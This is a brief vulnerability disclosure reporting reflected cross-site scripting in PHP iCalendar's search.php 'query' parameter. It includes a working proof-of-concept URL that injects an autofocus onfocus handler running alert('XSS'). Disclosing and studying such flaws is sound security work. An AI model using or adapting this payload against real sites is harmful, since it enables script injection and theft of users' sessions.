-------------------------------------------
XSS In PHP ICalendar
By SonnySpooks
-------------------------------------------
[Contact]
Twitter: @SonnySpooks
-------------------------------------------
1. [About App]
-------------------------------------------
PHP ICalendar is an ICal file viewer
Large sites use it all the time of course
It comes suitable and compatible with RSSNF
-------------------------------------------
2. [Issue With It]
-------------------------------------------
The Query= Parameter in the Search Bar
Does not sanitize Parses all the way.
-------------------------------------------
3. [Replication of attack]
-------------------------------------------
Placement: /search.php?cpath=&cal=&getdate=20160424&query=<PayLoad>
Example: /search.php?cpath=&cal=&getdate=20160424&query=1" onfocus="alert('XSS')" autofocus="">
-------------------------------------------
________
/\ \
/ \ \
/ \ \
/ \_______\
\ / /
___\ / ____/___
/\ \ / /\ \
/ \ \/___/ \ \
/ \ \ \ \
/ \_______\ \_______\
\ / / / /
\ / / / /
\ / /\ / /
\/_______/ \/_______/
-------------------------------------------